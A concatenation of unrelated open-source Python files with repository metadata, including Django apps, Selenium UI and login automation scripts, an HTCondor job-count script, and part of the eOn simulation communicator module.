out1 = conn.getresponse().read()
assert b'"error":null' in out1
assert conn.sock is not None #connection must be closed because wazzled should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
[
"62810104+wazzlecoin@users.noreply.github.com"
] |
62810104+wazzlecoin@users.noreply.github.com
|
7ac06a32c905204e1f99d52d0f91e3cdff349c56
|
769e3bdb320a57d680b46175d1959d73cb02e9c3
|
/books/migrations/0001_initial.py
|
867701ce4146399828c15ae1943484c3ed1dc4b2
|
[] |
no_license
|
nurbek-b/library_tutorial
|
28aed466f8cabd6180ddc574cb3de0b94de10623
|
4fda5928821a444302f4d15bdcb0466b3b3f842f
|
refs/heads/master
| 2022-05-12T10:55:50.813989
| 2019-09-23T11:12:10
| 2019-09-23T11:12:10
| 210,334,115
| 0
| 0
| null | 2022-04-22T22:31:25
| 2019-09-23T11:06:49
|
Python
|
UTF-8
|
Python
| false
| false
| 670
|
py
|
# Generated by Django 2.2.5 on 2019-09-19 13:21
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=250)),
('subtitle', models.CharField(max_length=250)),
('author', models.CharField(max_length=100)),
('isbn', models.CharField(max_length=13)),
],
),
]
|
[
"foto.nurbek@gmail.com"
] |
foto.nurbek@gmail.com
|
a0b6a0d0c97e5be1bdf104408bab4638cd811d7e
|
9782d916b4d386423e6fbf3883dca1aa3d38b4fa
|
/login_submission.py
|
99f2f2b3346809022e04ee15608b2fe97ed96f4c
|
[] |
no_license
|
Jai-Prakash-Singh/my_bot
|
3826ac1a8b2491aaf3fc25c7f68c033b19c3ad8d
|
285fe4cd58da9c995a5a420d02ba1c953c4d1021
|
refs/heads/master
| 2021-01-20T11:13:50.607298
| 2013-12-31T11:21:43
| 2013-12-31T11:21:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,530
|
py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
# -*- coding: iso-8859-15 -*-
# -*- coding: ascii -*-
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import firebug_proxy2
import time
from selenium.webdriver.support.ui import Select
def login():
#driver = webdriver.Firefox()
link = "http://goarticles.com/members/"
driver = firebug_proxy2.main(link)
#driver.get(link)
elem = driver.find_element_by_name("email")
elem.send_keys("xxxx@gmail.com")
elem = driver.find_element_by_name("password")
elem.send_keys("xxxxxxx")
elem.send_keys(Keys.RETURN)
#dir(driver)
elem = driver.find_element_by_id("add_new")
elem.send_keys(Keys.RETURN)
select = Select(driver.find_element_by_name('category_id'))
select.select_by_index(2)
#select = Select(driver.find_element_by_name('sub_category_id'))
#select.select_by_index(1)
elem = driver.find_element_by_name("title")
title = "Different Ways You Can Define Yourself "
elem.send_keys(title)
f = open("f1.html")
body = f.read()
body = unicode(body, errors='ignore')
f.close()
elem = driver.find_element_by_name("body")
elem.send_keys(body)
bio =" name Kaya, just learing how to write a article"
elem = driver.find_element_by_name("resource")
elem.send_keys(bio)
elem = driver.find_element_by_name("submit").click()
#elem.submit()
time.sleep(5)
driver.close()
if __name__=="__main__":
login()
|
[
"jp213@ymail.com"
] |
jp213@ymail.com
|
6fc97569c1683b8f6b0ae41fbb6ae187e7bf1f43
|
996079c6ebe6e44e91f1e4111c5026762775f094
|
/python/10-completed-jobs-group-hour.py
|
f628c9784c7b4cc984ba221cdff46c3527b41488
|
[] |
no_license
|
svaclav/htcondor-scripts
|
bae1c9a3520c149c727881d3b981954a2ff42e35
|
62b562cb9f6445447b395902aebfa170904c1f25
|
refs/heads/master
| 2021-05-05T23:47:05.857963
| 2018-04-26T13:23:13
| 2018-04-26T13:23:13
| 116,820,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
#!/usr/bin/python
"""
Finds total jobs running on target host
First argument of this script is the name of the server
"""
import string
import classad
import htcondor
from collections import defaultdict
jobsgroups = defaultdict(int)
groups = []
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-s", action="store_false", dest='servers', default=True, help="use all servers")
(options, args) = parser.parse_args()
coll = htcondor.Collector("htc.farm.particle.cz")
for submAd in coll.query(htcondor.AdTypes.Submitter, 'true', ['Name', 'RunningJobs']):
group = string.split(string.split(submAd['Name'],".")[0],"_")[1]
groups.append(group)
for scheddAd in coll.query(htcondor.AdTypes.Schedd, 'true', [ 'Name', 'MyAddress', 'ScheddIpAddr' ]):
schedd = htcondor.Schedd(scheddAd)
for jobAd in schedd.history('true', ['AcctGroup', 'CompletionDate', 'JobStatus'], 200):
accgroup = string.split(string.split(jobAd['AcctGroup'], ".")[0],"_")[1]
if jobAd['JobStatus'] == 4:
jobsgroups[accgroup] += 1
print "Number of completed jobs according to groups: "
print "=============================================\n "
for group, jobs in jobsgroups.iteritems():
#print "Number of completed jobs according to group %s: %d" % (group, jobs)
print '{0:10} ==> {1:10d}'.format(group, jobs)
|
[
"strachon@fzu.cz"
] |
strachon@fzu.cz
|
c07a4d322267bf67a777a7051bc7a430b443fe92
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/WW/FullRunII/Full2018_v9/jetpt0/TheoUnc/configuration.py
|
896351662ad01c0f0e1bef1292a88edb50436912
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
| 2023-08-18T20:39:31.954943
| 2023-08-18T09:23:34
| 2023-08-18T09:23:34
| 39,819,875
| 10
| 63
| null | 2023-08-10T14:08:04
| 2015-07-28T07:36:50
|
Python
|
UTF-8
|
Python
| false
| false
| 704
|
py
|
# Configuration file to produce initial root files -- has both merged and binned ggH samples
treeName = 'Events'
tag = 'WW2018_v9_jetpt0_TheoUnc'
# used by mkShape to define output directory for root files
outputDir = 'rootFile'
# file with TTree aliases
aliasesFile = 'aliases.py'
# file with list of variables
variablesFile = 'variables.py'
# file with list of cuts
cutsFile = 'cuts.py'
# file with list of samples
samplesFile = 'samples.py'
# luminosity to normalize to (in 1/fb)
# https://github.com/latinos/LatinoAnalysis/blob/UL_production/NanoGardener/python/data/TrigMaker_cfg.py#L868 (874)
lumi = 59.83
# nuisances file for mkDatacards and for mkShape
nuisancesFile = 'nuisances.py'
|
[
"Susan.Dittmer@cern.ch"
] |
Susan.Dittmer@cern.ch
|
2b05bafede7ab1e332eb8bdd2d6fb60800679e32
|
0d7467b096fe7ce212c7459be0c2b485b5d86168
|
/shelfzilla/apps/manga/views/volumes.py
|
31975f8cc0ba665274f0def1f74bdc16d7f93aa6
|
[] |
no_license
|
fmartingr/shelfzilla
|
86ecb7cf2f97ff9b13a7a8ce2415299b80207111
|
628aaf3d8799550e76143f2d7e0c78bdbeebd11e
|
refs/heads/master
| 2023-06-11T13:26:22.297856
| 2015-10-14T06:25:35
| 2015-10-14T06:25:35
| 381,305,902
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,205
|
py
|
from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.utils.translation import ugettext as _
from django.contrib import messages
from django.shortcuts import render_to_response, get_object_or_404
from django.core.urlresolvers import reverse
from ..models import Volume, UserWishlistVolume, UserHaveVolume, UserReadVolume
from .series import SeriesView
class WishlistVolumeView(SeriesView):
template = 'manga/series/volumes/volume-pjax.html'
def get(self, request, vid):
volume = get_object_or_404(Volume, pk=vid)
# Check if user already have this volume!
try:
UserHaveVolume.objects.get(volume=volume, user=request.user)
messages.error(
request,
_('{} is already on your collection!').format(volume)
)
except UserHaveVolume.DoesNotExist:
# Try to add to the wishlist...
try:
user_wish = UserWishlistVolume.objects.get(
volume=volume, user=request.user)
user_wish.delete()
messages.info(request,
_('{} removed from wishlist').format(volume))
except UserWishlistVolume.DoesNotExist:
# Or remove it if already in it!
user_wish = UserWishlistVolume(
volume=volume, user=request.user)
user_wish.save()
messages.success(request, _('{} wishlisted!').format(volume))
context = RequestContext(request, {'volume': volume})
if context.get('is_pjax'):
return render_to_response(self.template, context_instance=context)
else:
return HttpResponseRedirect(
reverse('series.detail', args=[volume.series.pk])
)
class HaveVolumeView(SeriesView):
template = 'manga/series/volumes/volume-pjax.html'
def get(self, request, vid):
volume = get_object_or_404(Volume, pk=vid)
try:
user_have = UserHaveVolume.objects.get(
volume=volume, user=request.user)
user_have.delete()
messages.info(request,
_('{} removed from collection.').format(volume))
except UserHaveVolume.DoesNotExist:
user_have = UserHaveVolume(volume=volume, user=request.user)
user_have.save()
messages.success(request,
_('{} added to collection!').format(volume))
# Remove from wishlist if it exists
try:
user_wish = UserWishlistVolume.objects.get(
volume=volume, user=request.user)
user_wish.delete()
except UserWishlistVolume.DoesNotExist:
pass
context = RequestContext(request, {'volume': volume})
if context.get('is_pjax'):
return render_to_response(self.template, context_instance=context)
else:
return HttpResponseRedirect(
reverse('series.detail', args=[volume.series.pk])
)
class ReadVolumeView(SeriesView):
template = 'manga/series/volumes/volume-pjax.html'
def get(self, request, vid):
volume = get_object_or_404(Volume, pk=vid)
# Try to add to the read list
try:
user_read = UserReadVolume.objects.get(
volume=volume, user=request.user)
user_read.delete()
messages.info(request,
_('{} marked as not read').format(volume))
except UserReadVolume.DoesNotExist:
# Or remove it if already in it!
user_read = UserReadVolume(
volume=volume, user=request.user)
user_read.save()
messages.success(request, _('{} marked as read!').format(volume))
context = RequestContext(request, {'volume': volume})
if context.get('is_pjax'):
return render_to_response(self.template, context_instance=context)
else:
return HttpResponseRedirect(
reverse('series.detail', args=[volume.series.pk])
)
|
[
"fmartingr@me.com"
] |
fmartingr@me.com
|
2d3521ff7dc65d4c46121f2cecc216071311db8b
|
1652b5c345a6f96717d1d07502a197834ab04221
|
/requirements/tests/ui/test_user_project_and_iteration_permission.py
|
7f9eb23ac65bb768fbc274754548b32492e93768
|
[] |
no_license
|
CS673Group3/project-mgmt-backend
|
5fe43412dd7efc4ea0693b7d6a9c430d1a1da795
|
21d2f5993a06edc46504eba395fca727c8b51422
|
refs/heads/master
| 2021-01-13T01:02:51.286403
| 2016-04-23T16:03:16
| 2016-04-23T16:03:16
| 51,478,447
| 0
| 3
| null | 2016-04-09T16:34:10
| 2016-02-10T22:49:55
|
Python
|
UTF-8
|
Python
| false
| false
| 10,584
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest
import time
import re
class TestUserProjectAndIterationPermission(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.implicitly_wait(30)
self.base_url = "http://127.0.0.1:8000"
self.verificationErrors = []
self.accept_next_alert = True
def test_user_project_and_iteration_permission(self):
driver = self.driver
driver.get(self.base_url + "/")
driver.get(self.base_url + "/")
driver.find_element_by_link_text("Sign In").click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("george")
driver.find_element_by_id("password").clear()
driver.find_element_by_id("password").send_keys("1234")
driver.find_element_by_xpath("//button[@type='submit']").click()
driver.find_element_by_link_text("george").click()
driver.find_element_by_link_text("Logout").click()
driver.find_element_by_link_text("Return to Home").click()
driver.find_element_by_link_text("Sign In").click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("SamuelLJackson")
driver.find_element_by_id("password").clear()
driver.find_element_by_id("password").send_keys("snakes")
driver.find_element_by_xpath("//button[@type='submit']").click()
driver.find_element_by_xpath(
"//a[@onclick=\"showDialog('/req/newproject');\"]").click()
for i in range(60):
try:
if self.is_element_present(By.ID, "id_title"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_id("id_title").clear()
driver.find_element_by_id("id_title").send_keys("New Project")
driver.find_element_by_id("id_description").clear()
driver.find_element_by_id("id_description").send_keys(
"This project shows that only a project manager permission will allow a user to make projects and iterations and add users to the project. Samuel L Jackson has this permission. George does not.")
driver.find_element_by_link_text("Create Project").click()
driver.find_element_by_link_text("Open").click()
driver.find_element_by_xpath(
"//div[@id='page-wrapper']/div[2]/div[2]/div/div/div/h2/a[2]/i").click()
for i in range(60):
try:
if self.is_element_present(By.ID, "id_user_role"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
Select(driver.find_element_by_id("id_user_role")).select_by_visible_text(
"Developer")
driver.find_element_by_xpath(
"//a[contains(@data-user-name, 'george')]").click()
time.sleep(1)
driver.find_element_by_link_text("Close").click()
driver.find_element_by_link_text("Iterations").click()
driver.find_element_by_link_text("New Iteration").click()
for i in range(60):
try:
if self.is_element_present(By.ID, "id_title"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_id("id_title").clear()
driver.find_element_by_id("id_title").send_keys("SAMUEL ADDED THIS")
driver.find_element_by_id("id_description").clear()
driver.find_element_by_id("id_description").send_keys(
"only Samuel can make iterations")
driver.find_element_by_xpath(
"//div[@id='id_start_date_popover']/div/span/i").click()
for i in range(60):
try:
if self.is_element_present(By.XPATH, "//tr[1]/td[4]"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_xpath("//tr[1]/td[4]").click()
driver.find_element_by_xpath(
"//div[@id='id_end_date_popover']/div/span/i").click()
for i in range(60):
try:
if self.is_element_present(
By.XPATH, "//div[5]/div[3]/table/tbody/tr[2]/td[4]"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_xpath(
"//div[5]/div[3]/table/tbody/tr[2]/td[4]").click()
driver.find_element_by_link_text("Create").click()
time.sleep(1)
driver.find_element_by_link_text("SamuelLJackson").click()
driver.find_element_by_link_text("Logout").click()
driver.find_element_by_link_text("Return to Home").click()
driver.find_element_by_link_text("Sign In").click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("george")
driver.find_element_by_id("password").clear()
driver.find_element_by_id("password").send_keys("1234")
driver.find_element_by_xpath("//button[@type='submit']").click()
driver.find_element_by_link_text("Open").click()
time.sleep(1)
driver.find_element_by_link_text("george").click()
driver.find_element_by_link_text("Logout").click()
driver.find_element_by_link_text("Return to Home").click()
driver.find_element_by_link_text("Sign In").click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("SamuelLJackson")
driver.find_element_by_id("password").clear()
driver.find_element_by_id("password").send_keys("snakes")
driver.find_element_by_xpath("//button[@type='submit']").click()
driver.find_element_by_link_text("Open").click()
for i in range(60):
try:
if self.is_element_present(By.LINK_TEXT, "george"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_link_text("george").click()
for i in range(60):
try:
if self.is_element_present(By.ID, "id_user_role"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
Select(driver.find_element_by_id("id_user_role")).select_by_visible_text(
"Developer")
driver.find_element_by_css_selector("button.btn.btn-primary").click()
driver.find_element_by_link_text("george").click()
for i in range(60):
try:
if self.is_element_present(By.LINK_TEXT, "Close"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_link_text("Close").click()
driver.find_element_by_css_selector(
"i.glyphicon.glyphicon-minus").click()
for i in range(60):
try:
if self.is_element_present(By.LINK_TEXT, "Delete"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_link_text("Delete").click()
time.sleep(1)
driver.find_element_by_link_text("Close").click()
time.sleep(1)
driver.find_element_by_link_text("SamuelLJackson").click()
driver.find_element_by_link_text("Logout").click()
driver.find_element_by_link_text("Return to Home").click()
driver.find_element_by_link_text("Sign In").click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("george")
driver.find_element_by_id("password").clear()
driver.find_element_by_id("password").send_keys("1234")
driver.find_element_by_xpath("//button[@type='submit']").click()
driver.find_element_by_link_text("george").click()
driver.find_element_by_link_text("Logout").click()
driver.find_element_by_link_text("Return to Home").click()
driver.find_element_by_link_text("Sign In").click()
driver.find_element_by_id("username").clear()
driver.find_element_by_id("username").send_keys("SamuelLJackson")
driver.find_element_by_id("password").clear()
driver.find_element_by_id("password").send_keys("snakes")
driver.find_element_by_xpath("//button[@type='submit']").click()
driver.find_element_by_link_text("Delete").click()
for i in range(60):
try:
if self.is_element_present(By.LINK_TEXT, "Delete Project"):
break
except:
pass
time.sleep(1)
else:
self.fail("time out")
driver.find_element_by_link_text("Delete Project").click()
time.sleep(1)
driver.find_element_by_link_text("SamuelLJackson").click()
driver.find_element_by_link_text("Logout").click()
driver.find_element_by_link_text("Return to Home").click()
def is_element_present(self, how, what):
try:
self.driver.find_element(by=how, value=what)
except NoSuchElementException as e:
return False
return True
def is_alert_present(self):
try:
self.driver.switch_to_alert()
except NoAlertPresentException as e:
return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally:
self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
|
[
"jwildey@gmail.com"
] |
jwildey@gmail.com
|
1daccf1c0b1c2010b9176d87471498251737910b
|
0ea8262ed5cba3482c0f450cfb290b646262b616
|
/BookingApp/urls.py
|
1dd506bede3bf0c30b6ac0865ad21fd71b1f3be7
|
[] |
no_license
|
squiremaguire69/MusicVenueConnect_Bookings
|
29608b187d49ef5604c12bd43685fc42c579cd25
|
f661354cc35a14f1144110cc45fee8550976cce6
|
refs/heads/master
| 2021-06-18T23:42:18.485183
| 2019-09-17T07:47:25
| 2019-09-17T07:47:25
| 205,142,645
| 0
| 0
| null | 2021-06-10T21:54:53
| 2019-08-29T10:54:06
|
Python
|
UTF-8
|
Python
| false
| false
| 867
|
py
|
"""BookingApp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from accounts import urls as urls_accounts
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^accounts/', include(urls_accounts)),
]
|
[
"ubuntu@ip-172-31-16-218.ec2.internal"
] |
ubuntu@ip-172-31-16-218.ec2.internal
|
6305c2a6ec5451a12fab6e4ebc0042a8ed77e0a6
|
5d8f7a08d2577d6147bec184b49fb48302887eb6
|
/home/migrations/0005_blogpage.py
|
52b7f80687a5cd8f5209fd934f5dddc0c2f5c3d1
|
[] |
no_license
|
qrames/atelier_chazalote
|
6bd0b566f370f85e24caf5d7148dee4ed1c788bd
|
9c735913ddbdefe7ab3a7ff3a955ae51191c0b09
|
refs/heads/master
| 2020-06-07T19:27:01.392878
| 2019-06-21T10:33:37
| 2019-06-21T10:33:37
| 193,080,166
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
# Generated by Django 2.2.2 on 2019-06-20 20:36
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0041_group_collection_permissions_verbose_name_plural'),
('home', '0004_homepage_image'),
]
operations = [
migrations.CreateModel(
name='BlogPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('date', models.DateField(verbose_name='Post date')),
('intro', models.CharField(max_length=250)),
('body', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
]
|
[
"ramque@orange.fr"
] |
ramque@orange.fr
|
a9335dd89522d707e5634e25b5faa71cd943a0a7
|
85029dbf4d24e0b876a23b09fa269826c4be13b3
|
/Pregnant_App.py
|
8414e7fe2c99cf9b1aa17d78b59bdb6c8eb12fc4
|
[] |
no_license
|
liorbraun/SmsWithAmazon
|
2cc58feb73a6fce46912c8378e2e5478370e8d24
|
16ad64423e06f8a8c5d31789003436299d8a4bcf
|
refs/heads/master
| 2020-07-05T16:21:01.527065
| 2019-08-16T09:18:00
| 2019-08-16T09:18:00
| 202,696,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
from Functions import *
import datetime
Dt = datetime.date.today()
ListOfclients = []
if __name__ == "__main__":
try:
option = "a"
id = 1
while str.lower(option) != "exit":
print("select option")
print("1: Add client")
print("2: save data")
print("3: check week")
print("4: Send Sms")
option = input('enter selection : ')
if str(option) == "1":
Add_client(id, Dt)
id += 1
print("thank you client have been added")
elif str(option) == "2":
save_data()
elif str(option) == "3":
check_week(Dt)
elif str(option) == "4":
Sendsms("972528021250", "תרים לנגיחה")
elif str(option) == "5":
add_text(2)
print("thank you good bye")
except Exception as e:
print("error in main", e)
|
[
"yyyarden@gmail.com"
] |
yyyarden@gmail.com
|
8f5a88bcf626a9d5007eab0089ea995f9317cb34
|
09c63ef7a90f5c940b0d8e9b4477d47081daaf73
|
/eon/eon/communicator.py
|
4b1799900b75c1d64722ae17439be9f0757dab1a
|
[] |
no_license
|
MaxAndersson/openstackeon
|
8b3bc62110331357f30ee4b9c8c77c9bbf5a91df
|
484a6bc854e208af8a494d98ab74ec6706d3e66d
|
refs/heads/master
| 2021-01-01T03:43:47.182487
| 2016-05-13T08:41:44
| 2016-05-13T08:41:44
| 58,280,053
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 53,225
|
py
|
##-----------------------------------------------------------------------------------
## eOn is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## A copy of the GNU General Public License is available at
## http://www.gnu.org/licenses/
##-----------------------------------------------------------------------------------
from array import array
import config
import os
import shutil
import logging
logger = logging.getLogger('communicator')
from time import sleep, time
import subprocess
import commands
import tarfile
from cStringIO import StringIO
import cPickle as pickle
import glob
import re
import numpy
import openstackeon,base64
from openstackeon.tasks import eon_work
# To ensure backward compatibility
import sys
if sys.version_info < (2, 5):
def any(iterable):
for element in iterable:
if element:
return True
return False
import re
def tryint(s):
try:
return int(s)
except:
return s
def alphanum_key(s):
""" Turn a string into a list of string and number chunks.
"z23a" -> ["z", 23, "a"]
"""
return [ tryint(c) for c in re.split('([0-9]+)', s) ]
def sort_nicely(l):
""" Sort the given list in the way that humans expect.
"""
l.sort(key=alphanum_key)
def get_communicator():
# This is an ugly hack to "remember" a communicator as it isn't possible to construct
# the MPI communicator multiple times and it needs to remember its object level variables.
if hasattr(get_communicator, 'comm'):
return get_communicator.comm
if config.comm_type=='boinc':
comm = BOINC(config.path_scratch, config.comm_boinc_project_dir,
config.comm_boinc_wu_template_path, config.comm_boinc_re_template_path,
config.comm_boinc_appname, config.comm_boinc_results_path,
config.comm_job_bundle_size, config.comm_boinc_priority)
elif config.comm_type=='cluster':
comm = Script(config.path_scratch, config.comm_job_bundle_size,
config.comm_script_name_prefix,
config.comm_script_path,
config.comm_script_queued_jobs_cmd,
config.comm_script_cancel_job_cmd,
config.comm_script_submit_job_cmd)
elif config.comm_type=='local':
comm = Local(config.path_scratch, config.comm_local_client,
config.comm_local_ncpus, config.comm_job_bundle_size)
elif config.comm_type=='mpi':
comm = MPI(config.path_scratch, config.comm_job_bundle_size)
elif config.comm_type=='arc':
comm = ARC(config.path_scratch, config.comm_job_bundle_size,
config.comm_client_path, config.comm_blacklist,
config.comm_num_submit)
elif config.comm_type=='openstack':
comm = OSP(config.path_scratch,config.comm_job_bundle_size,
config.comm_openstack_rc_files,
config.comm_openstack_n_workers,
config.comm_openstack_master_index,
config.comm_openstack_eon_server)
else:
logger.error(str(config.comm_type)+" is an unknown communicator.")
raise ValueError()
get_communicator.comm = comm
return comm
class NotImplementedError(Exception):
pass
class CommunicatorError(Exception):
pass
class EONClientError(Exception):
"""An EON client finished without outputting results, it probably crashed."""
pass
class Communicator:
def __init__(self, scratchpath, bundle_size=1):
if not os.path.isdir(scratchpath):
# should probably log this event
os.makedirs(scratchpath)
self.scratchpath = scratchpath
self.bundle_size = bundle_size
def submit_jobs(self, data, invariants):
'''Throws CommunicatorError if fails.'''
raise NotImplementedError()
def get_results(self, results):
'''Returns a list of dictionaries containing the results.'''
raise NotImplementedError()
def get_queue_size(self):
'''Returns the number of items waiting to run in the queue.'''
raise NotImplementedError()
def cancel_state(self, statenumber):
'''Returns the number of workunits that were canceled.'''
raise NotImplementedError()
def get_bundle_size(self, job_path):
if not isinstance(job_path, list):
# List files in job_path.
fnames = os.listdir(job_path)
else:
# job_path is already a list of filenames.
fnames = job_path
# Count results*.dat files.
pattern = re.compile(r'results(?:_\d+)?.dat$')
size = sum(1
for fname in fnames
if pattern.match(fname))
is_bundle = not (size == 1 and "results.dat" in fnames)
return size, is_bundle
def unbundle(self, resultpath, keep_result):
'''This method unbundles multiple jobs into multiple single
jobs so the akmc script can process them.
If the job did not return results (probably because it
crashed or was canceled), this method will raise
EONClientError.
'''
# These are the files in the result directory that we keep.
jobpaths = [ os.path.join(resultpath,d) for d in os.listdir(resultpath)
if os.path.isdir(os.path.join(resultpath,d)) ]
regex = re.compile(r"(\w+)_(\d+)(\.\w+)")
for jobpath in jobpaths:
basename, dirname = os.path.split(jobpath)
if not keep_result(dirname):
continue
# Need to figure out how many jobs were bundled together
# and then create the new job directories with the split files.
bundle_size, is_bundle = self.get_bundle_size(jobpath)
if bundle_size == 0:
logger.error("Client running in %s returned no results. "
"Check its output for errors." % jobpath)
# GH: just log the error and continue instead of quitting
#raise EONClientError("Client running in %s returned no results. "
# "Check its output for errors." % jobpath)
continue
results = [{'name': dirname} for i in xrange(bundle_size)]
if not is_bundle:
# Only a single task inside this job, no need to unbundle.
for filename in glob.glob(os.path.join(jobpath, "*.*")):
if not (filename.endswith(".con") or
filename.endswith(".dat")):
continue
rootname, fname = os.path.split(filename)
f = open(filename,'r')
filedata = StringIO(f.read())
f.close()
# add result to results
results[0][fname] = filedata
results[0]['number'] = 0
else:
# Several tasks bundled inside this job, we need to unbundle.
filenames = glob.glob(os.path.join(jobpath,"*_[0-9]*.*"))
for filename in filenames:
if not (filename.endswith(".con") or
filename.endswith(".dat")):
continue
# parse filename
rootname, fname = os.path.split(filename)
match = regex.match(fname)
if not match:
continue
parts = match.groups()
index = int(parts[1])
key = parts[0]+parts[2]
# Load data into stringIO object (should we just return filehandles?)
try:
f = open(filename,'r')
filedata = StringIO(f.read())
f.close()
except (IOError, OSError):
logger.exception("Failed to read file %s" % filename)
continue
# add result to results
results[index][key] = filedata
results[index]['number'] = index
# XXX: UGLY: We need a way to check if there are no results.
if not any([ filename.startswith('results') for filename in results[0].keys() ]):
logger.warning("Failed to find a result.dat file for %s",results[0]['name'])
results = []
yield results
def make_bundles(self, data, invariants):
'''This method is a generator that bundles together multiple jobs into a single job.
Example usage:
for jobpath in self.make_bundles(data, invariants):
do_stuff()'''
# Split jobpaths in to lists of size self.bundle_size.
chunks = [ data[i:i+self.bundle_size] for i in range(0, len(data), self.bundle_size) ]
for chunk in chunks:
# create the bundle's directory
job_path = os.path.join(self.scratchpath, chunk[0]['id'])
os.mkdir(job_path)
for filename in invariants.keys():
f = open(os.path.join(job_path, filename), 'w')
file_contents, file_permissions = invariants[filename]
# f.write(invariants[filename].getvalue())
f.write(file_contents.getvalue())
f.close()
os.chmod(os.path.join(job_path, filename), file_permissions)
# Concatenate all of the displacement and modes together.
n = 0
for job in chunk:
for basename in job.keys():
splitname = basename.rsplit(".", 1)
if len(splitname)!=2:
continue
if self.bundle_size == 1:
filename = basename
else:
filename = "%s_%d.%s" % (splitname[0], n, splitname[1])
f = open(os.path.join(job_path, filename), 'w')
f.write(job[basename].getvalue())
f.close()
n += 1
# Returns the jobpath to the new bigger workunit.
yield job_path
class BOINC(Communicator):
def __init__(self, scratchpath, boinc_project_dir, wu_template, result_template,
appname, boinc_results_path, bundle_size, priority):
'''
This constructor modifies sys.path to include the BOINC python
modules. It then tries to connect to the BOINC mysql database raising
exceptions if there are problems connecting. It also creates a file
named uniqueid in the scratchpath to identify BOINC jobs as belonging
to this akmc run if it doesn't exist. It then reads in the uniqueid
file and stores that as an integer in self.uniqueid.
'''
Communicator.__init__(self, scratchpath, bundle_size)
self.wu_template = wu_template
self.result_template = result_template
self.appname = appname
self.boinc_project_dir = boinc_project_dir
self.boinc_results_path = boinc_results_path
self.priority = priority
os.environ['BOINC_PROJECT_DIR'] = self.boinc_project_dir
import sys
sys.path.insert(0, os.path.join(self.boinc_project_dir, 'py'))
try:
import Boinc.database
import Boinc.db_base
import Boinc.boinc_db
except ImportError:
raise CommunicatorError("The Boinc python module could not be imported.\n"
"Perhaps the boinc project path is set incorrectly?")
self.database = Boinc.database
self.boinc_db_constants = Boinc.boinc_db
self.db_base = Boinc.db_base
try:
self.database.connect_default_config()
except:
# XXX: This error handling is maybe a little ugly, but provides all the information
# that you would want to know. The exception that connect_default_config() throws
